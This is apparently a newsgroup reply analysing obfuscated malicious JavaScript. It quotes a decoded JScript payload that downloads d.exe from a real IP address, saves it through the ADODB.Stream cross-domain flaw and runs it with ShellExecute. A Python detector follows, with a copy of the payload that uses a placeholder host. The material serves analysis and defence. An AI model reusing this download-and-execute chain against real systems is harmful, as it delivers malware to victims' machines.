Re: Malicious javascript obfuscation
"Wong Yung" wrote:
> *Sigh* I couldn't get a nice simple evil guy could I?
Many of the malware writers today are funded by organized crime, and
the software is getting more sophisticated. It's not so much hackers
having fun anymore.
> BTW what is this other more obfuscated exploit that you found?
There are a couple of levels of encoded script which I won't go
through here, but eventually it boils down to this (some munging
again; [ ] replace < >, and ht_p replaces http) ...
[script language='jscript']
a=new ActiveXObject('Shell.Application');
var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');
x.Open('GET','ht_p://66.36.241.243/d.exe',0);
x.Send();
var s=new ActiveXObject('ADODB.Stream');
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile('../tm.exe',2);
a.ShellExecute('../tm.exe');
[/script]
So here is another method of downloading "d.exe" from the same IP
address as before, then using the ADODB.Stream cross-domain exploit
to save the file as "tm.exe" and run it in the context of the local
machine. MS patched this particular vulnerability some time ago.
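A defender-side check for the chain described in this post, added here as an example and not code from the thread: it folds the 'Mic'+'ros'+'oft.X'+'MLHTTP' string-splitting trick, then flags the XMLHTTP fetch, ADODB.Stream write, SaveToFile and ShellExecute sequence. The embedded sample is a constructed, de-munged copy of the quoted script with the download host replaced by a placeholder.

```python
import re

# Constructed sample: the quoted script with < > restored and the real
# download host replaced by a placeholder (assumption, not the original IP).
SAMPLE = """<script language='jscript'>
a=new ActiveXObject('Shell.Application');
var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');
x.Open('GET','http://EXAMPLE-HOST/d.exe',0);
x.Send();
var s=new ActiveXObject('ADODB.Stream');
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile('../tm.exe',2);
a.ShellExecute('../tm.exe');
</script>"""

# 'abc'+'def' -> 'abcdef': undo the literal-splitting used to hide ProgIDs.
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def fold_concats(src):
    """Repeatedly join adjacent single-quoted literals until none remain."""
    prev = None
    while prev != src:
        prev, src = src, CONCAT.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), src)
    return src

# Stages of the download-and-execute chain the post walks through.
STAGES = {
    "xmlhttp_fetch": r"ActiveXObject\('Microsoft\.XMLHTTP'\)",
    "adodb_stream":  r"ActiveXObject\('ADODB\.Stream'\)",
    "binary_mode":   r"\.Type\s*=\s*1\b",
    "save_to_file":  r"\.SaveToFile\(",
    "shell_execute": r"\.ShellExecute\(",
}

def classify(src):
    """Return (stages present after de-obfuscation, verdict string)."""
    folded = fold_concats(src)
    hits = [name for name, pat in STAGES.items() if re.search(pat, folded, re.I)]
    # A fetch alone is common in legitimate pages; writing the response to
    # disk via ADODB.Stream and then executing it is the exploit pattern.
    required = {"adodb_stream", "save_to_file", "shell_execute"}
    verdict = "download-and-execute" if required <= set(hits) else "benign-or-unknown"
    return hits, verdict

if __name__ == "__main__":
    print(classify(SAMPLE))
```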